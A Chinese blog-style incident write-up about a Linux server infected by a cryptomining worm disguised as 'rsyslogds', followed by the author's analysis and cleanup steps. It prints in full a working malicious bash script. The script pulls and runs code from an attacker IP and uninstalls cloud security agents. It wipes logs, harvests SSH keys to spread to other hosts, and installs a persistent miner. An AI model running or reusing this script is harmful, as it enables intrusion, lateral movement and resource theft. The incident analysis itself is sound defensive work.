记一次服务器被安插挖矿木马rsyslogds的处理过程(记一次服务器被安插挖矿木马rsyslogds的处理过程)
记一次服务器被安插挖矿木马rsyslogds的处理过程(记一次服务器被安插挖矿木马rsyslogds的处理过程)再来看看这个定时任务中究竟干了些啥:首先来看看这个远程的IP信息,来自美国服务器,臭不要脸:通过 crontab -l 来看一下,果然如此:具体如下:# crontab -l 30 23 * * * (curl -s http://192.210.200.66:1234/xmss||wget -q -O - http://192.210.200.66:1234/xmss )|bash -sh ##这个定时任务中设置了在23:30的时自动从远程下载一个脚本下来执行。
收到告警收到告警报告说服务器CPU高:
马上上服务器查看top:
看到有3个名为rsyslogds的进程导致的CPU高,初看还以为是系统进程rsyslog,仔细看实则为挖矿程序伪装成系统的服务。
根据经验,一般像挖矿、木马、后门这一类的程序入侵服务器后通常都会在服务器上自动设置一些定时任务,来看看是不是这样。
通过 crontab -l 来看一下,果然如此:
具体如下:
# crontab -l
30 23 * * * (curl -s http://192.210.200.66:1234/xmss||wget -q -O - http://192.210.200.66:1234/xmss )|bash -sh
##
这个定时任务中设置了在23:30的时自动从远程下载一个脚本下来执行。
首先来看看这个远程的IP信息,来自美国服务器,臭不要脸:
再来看看这个定时任务中究竟干了些啥:
# wget http://192.210.200.66:1234/xmss
# cat xmss
文件内容如下:
#!/bin/bash
SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
setenforce 0 2>/dev/null
ulimit -n 65535
ufw disable
iptables -P INPUT ACCEPT
iptables -P OUTPUT ACCEPT
iptables -P FORWARD ACCEPT
iptables -F
echo "vm.nr_hugepages=$((1168 $(nproc)))" | tee -a /etc/sysctl.conf
sysctl -w vm.nr_hugepages=$((1168 $(nproc)))
echo '0' >/proc/sys/kernel/nmi_watchdog
echo 'kernel.nmi_watchdog=0' >>/etc/sysctl.conf
mv /usr/bin/ps.original /usr/bin/ps
netstat -antp | grep ':7777' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs -I % kill -9 %
netstat -antp | grep ':14444' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs -I % kill -9 %
netstat -antp | grep ':5790' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs -I % kill -9 %
netstat -antp | grep ':45700' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs -I % kill -9 %
netstat -antp | grep ':2222' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs -I % kill -9 %
netstat -antp | grep ':9999' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs -I % kill -9 %
netstat -antp | grep ':20580' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs -I % kill -9 %
netstat -antp | grep ':13531' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs -I % kill -9 %
netstat -antp | grep '23.94.24.12' | awk '{print $7}' | sed -e 's/\/.*//g' | xargs -I % kill -9 %
netstat -antp | grep '134.122.17.13' | awk '{print $7}' | sed -e 's/\/.*//g' | xargs -I % kill -9 %
netstat -antp | grep '66.70.218.40' | awk '{print $7}' | sed -e 's/\/.*//g' | xargs -I % kill -9 %
netstat -antp | grep '209.141.35.17' | awk '{print $7}' | sed -e 's/\/.*//g' | xargs -I % kill -9 %
echo "123"
netstat -antp | grep '192.42.116.41' | awk '{print $7}' | sed -e 's/\/.*//g' | xargs -I % kill -9 %
netstat -antp | grep '101.32.73.178' | awk '{print $7}' | sed -e 's/\/.*//g' | xargs -I % kill -9 %
netstat -antp | grep 185.238.250.137 | awk '{print $7}' | awk -F '[/]' '{print $1}' | xargs -I % kill -9 %
netstat -antp | grep tmate | awk '{print $7}' | awk -F '[/]' '{print $1}' | xargs -I % kill -9 %
netstat -antp | grep kinsing | awk '{print $7}' | awk -F '[/]' '{print $1}' | xargs -I % kill -9 %
netstat -antp | grep kdevtmpfsi | awk '{print $7}' | awk -F '[/]' '{print $1}' | xargs -I % kill -9 %
netstat -antp | grep pythonww | awk '{print $7}' | awk -F '[/]' '{print $1}' | xargs -I % kill -9 %
netstat -antp | grep tcpp | awk '{print $7}' | awk -F '[/]' '{print $1}' | xargs -I % kill -9 %
netstat -antp | grep c3pool | awk '{print $7}' | awk -F '[/]' '{print $1}' | xargs -I % kill -9 %
netstat -antp | grep xmr | awk '{print $7}' | awk -F '[/]' '{print $1}' | xargs -I % kill -9 %
netstat -antp | grep f2pool | awk '{print $7}' | awk -F '[/]' '{print $1}' | xargs -I % kill -9 %
netstat -antp | grep crypto-pool | awk '{print $7}' | awk -F '[/]' '{print $1}' | xargs -I % kill -9 %
netstat -antp | grep t00ls | awk '{print $7}' | awk -F '[/]' '{print $1}' | xargs -I % kill -9 %
netstat -antp | grep vihansoft | awk '{print $7}' | awk -F '[/]' '{print $1}' | xargs -I % kill -9 %
netstat -antp | grep mrbpool | awk '{print $7}' | awk -F '[/]' '{print $1}' | xargs -I % kill -9 %
ps aux | grep -a -E ".libs|kdevtmpfsi|rot|kinsing|solr|f2pool|tcpp|xmr|tmate|185.238.250.137|c3pool" | awk '{print $2}' | xargs kill -9
if [ $(cat /etc/resolv.conf | grep 8.8.8.8|grep -v grep|wc -l) -eq '0' ];then
echo 'nameserver 8.8.8.8' >> /etc/resolv.conf
else
echo "ok"
fi
der(){
if ps aux | grep -i '[a]liyun'; then
/etc/init.d/aegis uninstall
(wget -q -O - http://update.aegis.aliyun.com/download/uninstall.sh||curl -s http://update.aegis.aliyun.com/download/uninstall.sh)|bash; lwp-download http://update.aegis.aliyun.com/download/uninstall.sh /tmp/uninstall.sh; bash /tmp/uninstall.sh
(wget -q -O - http://update.aegis.aliyun.com/download/quartz_uninstall.sh||curl -s http://update.aegis.aliyun.com/download/quartz_uninstall.sh)|bash; lwp-download http://update.aegis.aliyun.com/download/quartz_uninstall.sh /tmp/uninstall.sh; bash /tmp/uninstall.sh
sudo pkill aliyun-service
killall -9 aliyun-service
sudo pkill AliYunDun
killall -9 AliYunDun
iptables -I INPUT -s 100.100.30.1/28 -j DROP
iptables -I INPUT -s 140.205.201.0/28 -j DROP
iptables -I INPUT -s 140.205.201.16/29 -j DROP
iptables -I INPUT -s 140.205.201.32/28 -j DROP
iptables -I INPUT -s 140.205.225.192/29 -j DROP
iptables -I INPUT -s 140.205.225.200/30 -j DROP
iptables -I INPUT -s 140.205.225.184/29 -j DROP
iptables -I INPUT -s 140.205.225.183/32 -j DROP
iptables -I INPUT -s 140.205.225.206/32 -j DROP
iptables -I INPUT -s 140.205.225.205/32 -j DROP
iptables -I INPUT -s 140.205.225.195/32 -j DROP
iptables -I INPUT -s 140.205.225.204/32 -j DROP
rm -rf /etc/init.d/agentwatch /usr/sbin/aliyun-service
rm -rf /usr/local/aegis*
systemctl stop aliyun.service
systemctl disable aliyun.service
service bcm-agent stop
yum remove bcm-agent -y
apt-get remove bcm-agent -y
/usr/local/cloudmonitor/wrapper/bin/cloudmonitor.sh stop
/usr/local/cloudmonitor/wrapper/bin/cloudmonitor.sh remove
rm -rf /usr/local/cloudmonitor
elif ps aux | grep -i '[y]unjing'; then
process=(sap100 secu-tcs-agent sgagent64 barad_agent agent agentPlugInD pvdriver )
for i in ${process[@]}
do
for A in $(ps aux | grep $i | grep -v grep | awk '{print $2}')
do
kill -9 $A
done
done
chkconfig --level 35 postfix off
service postfix stop
/usr/local/qcloud/stargate/admin/stop.sh
/usr/local/qcloud/stargate/admin/uninstall.sh
/usr/local/qcloud/YunJing/uninst.sh
/usr/local/qcloud/monitor/barad/admin/stop.sh
/usr/local/qcloud/monitor/barad/admin/uninstall.sh
rm -rf /usr/local/sa
rm -rf /usr/local/agenttools
rm -rf /usr/local/qcloud
rm -f /etc/cron.d/sgagenttask
fi
sleep 1
echo "DER Uninstalled"
}
function CLEANUP_TEAMTNT_TRACES(){
rm -fr /dev/shm/dia/ 2>/dev/null 1>/dev/null
rm -f ~/.bash_history 2>/dev/null 1>/dev/null
touch ~/.bash_history 2>/dev/null 1>/dev/null
history -c 2>/dev/null 1>/dev/null
chattr i ~/.bash_history 2>/dev/null 1>/dev/null
clear
if [[ "$0" != "bash" ]]; then rm -f $0; fi
cat /dev/null >/var/spool/mail/root 2>/dev/null
cat /dev/null >/var/log/wtmp 2>/dev/null
cat /dev/null >/var/log/secure 2>/dev/null
cat /dev/null >/var/log/cron 2>/dev/null
}
function TEAMTNT_DLOAD() {
read proto server path <<< "${1//"/"/ }"
DOC=/${path// //}
HOST=${server//:*}
PORT=${server//*:}
[[ x"${HOST}" == x"${PORT}" ]] && PORT=80
exec 3<>/dev/tcp/${HOST}/$PORT
echo -en "GET ${DOC} HTTP/1.0\r\nHost: ${HOST}\r\n\r\n" >&3
while IFS= read -r line ; do
[[ "$line" == $'\r' ]] && break
done <&3
nul='\0'
while IFS= read -d '' -r x || { nul=""; [ -n "$x" ]; }; do
printf "%s$nul" "$x"
done <&3
exec 3>&-
}
function CLEANUP_TEAMTNT_TRACES(){
rm -fr /dev/shm/dia/ 2>/dev/null 1>/dev/null
rm -f ~/.bash_history 2>/dev/null 1>/dev/null
touch ~/.bash_history 2>/dev/null 1>/dev/null
history -c 2>/dev/null 1>/dev/null
chattr i ~/.bash_history 2>/dev/null 1>/dev/null
clear
if [[ "$0" != "bash" ]]; then rm -f $0; fi
cat /dev/null >/var/spool/mail/root 2>/dev/null
cat /dev/null >/var/log/wtmp 2>/dev/null
cat /dev/null >/var/log/secure 2>/dev/null
cat /dev/null >/var/log/cron 2>/dev/null
}
url="192.210.200.66:1234"
ipurl="http://192.210.200.66:1234"
cronlow(){
cr=$(crontab -l | grep -q $url | wc -l)
if [ ${cr} -eq 0 ];then
crontab -r
(crontab -l 2>/dev/null; echo "30 23 * * * (curl -s http://$url/xmss||wget -q -O - http://$url/xmss )|bash -sh")| crontab -
else
echo "cronlow skip"
fi
}
cron(){
if cat /etc/cron.d/`whoami` /etc/cron.d/apache /var/spool/cron/`whoami` /var/spool/cron/crontabs/`whoami` /etc/cron.hourly/oanacroner1 | grep -q "205.185.113.151\|5.196.247.12\|bash.givemexyz.xyz\|194.156.99.30\|cHl0aG9uIC1jICdpbXBvcnQgdXJsbGliO2V4ZWModXJsbGliLnVybG9wZW4oImh0dHA6Ly8xOTQuMTU2Ljk5LjMwL2QucHkiKS5yZWFkKCkpJw==\|bash.givemexyz.in\|205.185.116.78"
then
chattr -i -a /etc/cron.d/`whoami` /etc/cron.d/apache /var/spool/cron/`whoami` /var/spool/cron/crontabs/`whoami` /etc/cron.hourly/oanacroner1
crontab -r
fi
if cat /etc/cron.d/`whoami` /etc/cron.d/apache /var/spool/cron/`whoami` /var/spool/cron/crontabs/`whoami` /etc/cron.hourly/oanacroner1 | grep "$url"
then
echo "Cron exists"
else
apt-get install -y cron
yum install -y vixie-cron crontabs
service crond start
chkconfig --level 35 crond on
echo "Cron not found"
echo -e "30 23 * * * root (curl -s http://$url/xmss||wget -q -O - http://$url/xmss )|bash -sh\n##" > /etc/cron.d/`whoami`
echo -e "30 23 * * * root (curl -s http://$url/xmss||wget -q -O - http://$url/xmss )|bash -sh\n##" > /etc/cron.d/apache
echo -e "30 23 * * * root (curl -s http://$url/xmss||wget -q -O - http://$url/xmss )|bash -sh\n##" > /etc/cron.d/nginx
echo -e "30 23 * * * (curl -s http://$url/xmss||wget -q -O - http://$url/xmss )|bash -sh\n##" > /var/spool/cron/`whoami`
mkdir -p /var/spool/cron/crontabs
echo -e "30 23 * * * (curl -s http://$url/xmss||wget -q -O - http://$url/xmss )|bash -sh\n##" > /var/spool/cron/crontabs/`whoami`
mkdir -p /etc/cron.hourly
echo "(curl -s http://$url/xmss||wget -q -O - http://$url/xmss )|bash -sh" > /etc/cron.hourly/oanacroner1 | chmod 755 /etc/cron.hourly/oanacroner1
echo "(curl -s http://$url/xmss||wget -q -O - http://$url/xmss )|bash -sh" > /etc/cron.hourly/oanacroner1 | chmod 755 /etc/init.d/down
chattr ai -V /etc/cron.d/`whoami` /etc/cron.d/apache /var/spool/cron/`whoami` /var/spool/cron/crontabs/`whoami` /etc/cron.hourly/oanacroner1 /etc/init.d/down
fi
chattr -i -a /etc/cron.d/`whoami` /etc/cron.d/apache /var/spool/cron/`whoami` /var/spool/cron/crontabs/`whoami` /etc/cron.hourly/oanacroner1
echo "(curl -s http://$url/xmss||wget -q -O - http://$url/xmss )|bash -sh" > /etc/init.d/down | chmod 755 /etc/init.d/down
}
localgo() {
echo "localgo start"
myhostip=$(curl -sL icanhazip.com)
KEYS=$(find ~/ /root /home -maxdepth 3 -name 'id_rsa*' | grep -vw pub)
KEYS2=$(cat ~/.ssh/config /home/*/.ssh/config /root/.ssh/config | grep IdentityFile | awk -F "IdentityFile" '{print $2 }')
KEYS3=$(cat ~/.bash_history /home/*/.bash_history /root/.bash_history | grep -E "(ssh|scp)" | awk -F ' -i ' '{print $2}' | awk '{print $1'})
KEYS4=$(find ~/ /root /home -maxdepth 3 -name '*.pem' | uniq)
HOSTS=$(cat ~/.ssh/config /home/*/.ssh/config /root/.ssh/config | grep HostName | awk -F "HostName" '{print $2}')
HOSTS2=$(cat ~/.bash_history /home/*/.bash_history /root/.bash_history | grep -E "(ssh|scp)" | grep -oP "([0-9]{1 3}\.){3}[0-9]{1 3}")
HOSTS3=$(cat ~/.bash_history /home/*/.bash_history /root/.bash_history | grep -E "(ssh|scp)" | tr ':' ' ' | awk -F '@' '{print $2}' | awk -F '{print $1}')
HOSTS4=$(cat /etc/hosts | grep -vw "0.0.0.0" | grep -vw "127.0.1.1" | grep -vw "127.0.0.1" | grep -vw $myhostip | sed -r '/\n/!s/[0-9.] /\n&\n/;/^([0-9]{1 3}\.){3}[0-9]{1 3}\n/P;D' | awk '{print $1}')
HOSTS5=$(cat ~/*/.ssh/known_hosts /home/*/.ssh/known_hosts /root/.ssh/known_hosts | grep -oP "([0-9]{1 3}\.){3}[0-9]{1 3}" | uniq)
HOSTS6=$(ps auxw | grep -oP "([0-9]{1 3}\.){3}[0-9]{1 3}" | grep ":22" | uniq)
USERZ=$(
echo "root"
find ~/ /root /home -maxdepth 2 -name '\.ssh' | uniq | xargs find | awk '/id_rsa/' | awk -F'/' '{print $3}' | uniq | grep -wv ".ssh"
)
USERZ2=$(cat ~/.bash_history /home/*/.bash_history /root/.bash_history | grep -vw "cp" | grep -vw "mv" | grep -vw "cd " | grep -vw "nano" | grep -v grep | grep -E "(ssh|scp)" | tr ':' ' ' | awk -F '@' '{print $1}' | awk '{print $4}' | uniq)
sshports=$(cat ~/.bash_history /home/*/.bash_history /root/.bash_history | grep -vw "cp" | grep -vw "mv" | grep -vw "cd " | grep -vw "nano" | grep -v grep | grep -E "(ssh|scp)" | tr ':' ' ' | awk -F '-p' '{print $2}' | awk '{print $1}' | sed 's/[^0-9]*//g' | tr ' ' '\n' | nl | sort -u -k2 | sort -n | cut -f2- | sed -e "\$a22")
userlist=$(echo "$USERZ $USERZ2" | tr ' ' '\n' | nl | sort -u -k2 | sort -n | cut -f2- | grep -vw "." | grep -vw "ssh" | sed '/\./d')
hostlist=$(echo "$HOSTS $HOSTS2 $HOSTS3 $HOSTS4 $HOSTS5 $HOSTS6" | grep -vw 127.0.0.1 | tr ' ' '\n' | nl | sort -u -k2 | sort -n | cut -f2-)
keylist=$(echo "$KEYS $KEYS2 $KEYS3 $KEYS4" | tr ' ' '\n' | nl | sort -u -k2 | sort -n | cut -f2-)
i=0
for user in $userlist; do
for host in $hostlist; do
for key in $keylist; do
for sshp in $sshports; do
((i ))
if [ "${i}" -eq "20" ]; then
sleep 5
ps wx | grep "ssh -o" | awk '{print $1}' | xargs kill -9 &>/dev/null &
i=0
fi
#Wait 5 seconds after every 20 attempts and clean up hanging processes
chmod r $key
chmod 400 $key
echo "$user@$host"
ssh -oStrictHostKeyChecking=no -oBatchMode=yes -oConnectTimeout=3 -i $key $user@$host -p $sshp "(curl -s http://$ipurl/xmss||wget -q -O - http://$ipurl/xmss)|bash -sh; echo $base | base64 -d | bash -; lwp-download http://$ipurl/xms /tmp/xms; bash /tmp/xms; rm -rf /tmp/xms"
ssh -oStrictHostKeyChecking=no -oBatchMode=yes -oConnectTimeout=3 -i $key $user@$host -p $sshp "(curl -s http://$ipurl/xmss||wget -q -O - http://$ipurl/xmss)|bash -sh; echo $base | base64 -d | bash -; lwp-download http://$ipurl/xms /tmp/xms; bash /tmp/xms; rm -rf /tmp/xms"
done
done
done
done
# scangogo
echo "local done"
}
setupxmrservice(){
echo "[*] Removing previous c3pool miner (if any)"
if sudo -n true 2>/dev/null; then
sudo systemctl stop c3pool_miner.service
sudo systemctl stop moneroocean_miner.service
fi
killall -9 xmrig
echo "[*] Removing $HOME/c3pool directory"
rm -rf $HOME/c3pool
rm -rf $HOME/moneroocean
mv /tmp/.rsyslogds.sh /usr/sbin/.rsyslogds.sh
if [ $(netstat -antp|grep 'rsyslogds'|grep 'ESTABLISHED'|grep -v grep|wc -l) -eq '0' ];then
TEAMTNT_DLOAD $ipurl/.rsyslogds > /usr/sbin/.rsyslogds;chmod x /usr/sbin/.rsyslogds
# preparing script
echo "[*] Creating $HOME/c3pool/miner.sh script"
mv /tmp/.rsyslogds.sh /usr/sbin/.rsyslogds.sh
chmod x /usr/sbin/.rsyslogds.sh
/bin/bash /usr/sbin/.rsyslogds.sh >/dev/null 2>&1
# preparing script background work and work under reboot
if ! grep .rsyslogds.sh $HOME/.profile >/dev/null; then
echo "[*] Adding $HOME/c3pool/miner.sh script to $HOME/.profile"
echo "/usr/sbin/.rsyslogds.sh >/dev/null 2>&1" >>$HOME/.profile
else
echo "Looks like $HOME/c3pool/miner.sh script is already in the $HOME/.profile"
fi
if ! grep rsyslogds.sh /etc/rc.d/rc.local >/dev/null; then
echo "[*] Adding $HOME/c3pool/miner.sh script to /etc/rc.d/rc.local"
echo "/usr/sbin/.rsyslogds.sh >/dev/null 2>&1" >>/etc/rc.d/rc.local
else
echo "Looks like $HOME/c3pool/miner.sh script is already in the $HOME/.profile"
fi
if [[ $(grep MemTotal /proc/meminfo | awk '{print $2}') > 3500000 ]]; then
echo "[*] Enabling huge pages"
echo "vm.nr_hugepages=$((1168 $(nproc)))" | sudo tee -a /etc/sysctl.conf
sudo sysctl -w vm.nr_hugepages=$((1168 $(nproc)))
fi
if ! type systemctl >/dev/null; then
echo "[*] Running miner in the background (see logs in $HOME/c3pool/xmrig.log file)"
/bin/bash /usr/sbin/.rsyslogds.sh >/dev/null 2>&1
echo "ERROR: This script requires \"systemctl\" systemd utility to work correctly."
echo "Please move to a more modern Linux distribution or setup miner activation after reboot yourself if possible."
else
echo "[*] Creating c3pool_miner systemd service"
sudo mv /tmp/rsyslogds.service /etc/systemd/system/rsyslogds.service
echo "[*] Starting c3pool_miner systemd service"
sudo killall xmrig 2>/dev/null
sudo systemctl daemon-reload
sudo systemctl enable rsyslogds.service
sudo systemctl start rsyslogds.service
echo "To see miner service logs run \"sudo journalctl -u c3pool_miner -f\" command"
fi
fi
}
der
if [ -w /usr/sbin ]; then
SPATH=/usr/sbin
else
SPATH=/tmp
fi
echo $SPATH
cat >/tmp/.rsyslogds.sh <<EOL
#!/bin/bash
function TEAMTNT_DLOAD() {
read proto server path <<< "${1//"/"/ }"
DOC=/${path// //}
HOST=${server//:*}
PORT=${server//*:}
[[ x"${HOST}" == x"${PORT}" ]] && PORT=80
exec 3<>/dev/tcp/${HOST}/$PORT
echo -en "GET ${DOC} HTTP/1.0\r\nHost: ${HOST}\r\n\r\n" >&3
while IFS= read -r line ; do
[[ "$line" == $'\r' ]] && break
done <&3
nul='\0'
while IFS= read -d '' -r x || { nul=""; [ -n "$x" ]; }; do
printf "%s$nul" "$x"
done <&3
exec 3>&-
}
if [ $(curl $ipurl/v) != $(md5sum /usr/sbin/.rsyslogds| awk '{print $1}')]; then
if ! pidof .rsyslogds >/dev/null; then
/usr/sbin/.rsyslogds
fi
else
TEAMTNT_DLOAD $ipurl/.rsyslogds > /usr/sbin/.rsyslogds;chmod x /usr/sbin/.rsyslogds
pkill .rsyslogds
/usr/sbin/.rsyslogds
fi
EOL
cat >/tmp/rsyslogds.service <<EOL
[Unit]
Description=rsyslogdservice
[Service]
ExecStart=/usr/sbin/.rsyslogds
Restart=always
Nice=10
CPUWeight=1
[Install]
WantedBy=multi-user.target
EOL
if [ "$SPATH" = "/usr/sbin" ]
then
if [ $(curl -fsSL $ipurl/v||wget -q -O - $ipurl/v) != $(md5sum $SPATH/.rsyslogds | awk '{print $1}') ]
then
chattr -ai $SPATH/.rsyslogds
ps aux | grep -a -E ".rsyslogds" | awk '{print $2}' | xargs kill -9
TEAMTNT_DLOAD $ipurl/.rsyslogds > $SPATH/.rsyslogds;chmod x $SPATH/.rsyslogds;$SPATH/.rsyslogds
setupxmrservice
localgo
cron
else
$SPATH/.rsyslogds
setupxmrservice
localgo
cron
fi
else
TEAMTNT_DLOAD $ipurl/.rsyslogds > $SPATH/.rsyslogds;chmod x $SPATH/.rsyslogds;$SPATH/.rsyslogds
cronlow
fi
if [ $(ps aux|grep inis|grep -v grep|wc -l) -eq '0' ];
then
TEAMTNT_DLOAD $ipurl/.inis > $SPATH/.inis;chmod x $SPATH/.inis
cd $SPATH
nohup ./.inis &
else
echo "ok"
fi
CLEANUP_TEAMTNT_TRACES
根据脚本内容,可以看出,脚本对服务器进行了一系列骚操作,主要如下:
- 文件一开头就来了些设置:设置环境变量、关闭selinux、修改防火墙设置、修改内核参数、杀掉一些进程、设置DNS
- 然后就是几个函数:
- der() 将阿里云或腾讯云安全组件给你卸载掉
- CLEANUP_TEAMTNT_TRACES() 将操作记录日志全部抹掉
- TEAMTNT_DLOAD() 不知在做啥
- CLEANUP_TEAMTNT_TRACES() 将操作记录日志全部抹掉,定义重复了吧?
- 定义了两个下载挖矿程序远程脚本的地址url和ipurl
- cronlow() 看你定时任务里有没有它的远程地址,没有就直接全部将crontab清空了,设置一个它的定时任务,你真牛P
- cron() 设置了更多的定时任务在其他用户下以及其他一些定时任务文件里、其中还包含了账户地址
- localgo() 获取你的公钥私钥,根据你机器上的历史操作记录获取到操作过的主机,尝试登录到这些主机上设置下载挖矿程序的定时任务,太坏了
- setupxmrservice() 删除一些操作目录,然后在.profile和/etc/rc.d/rc.local给你加了些自动执行脚本命令,还设置了系统服务,我真实谢谢你了
- 接下来就是正式执行脚本了,调用der函数,写入函数里要调用的脚本内容,继续调用相应的函数
- 最后调用CLEANUP_TEAMTNT_TRACES清除操作记录
这一波下来反而值得学习学习呢,手动狗头。。。
临时解决办法先将进程干掉:
ps aux|grep rsyslogds|grep -v grep|awk '{print $2}'|xargs kill -9
或
pkill rsyslogds
杀掉之后 CPU 瞬间就恢复平静了。
接下来就根据脚本内容,反向排查脚本在服务器上做的操作一个个给它删除或修复。
首先将定时任务全部干掉,然后再搞其他的,要不然它随时都给你运行起来,找到这些用户下的定时任务都删掉。:
然后,其他根据脚本再一个个删除修复。
这里就不记录了。
最终解决办法为了避免没有修复到的地方,临时处理好后最好的解决办法就是,备份好服务器上的资料,将服务器重新安装或初始化,再重新部署服务,然后检查服务是否有漏洞情况,防止再次被黑。
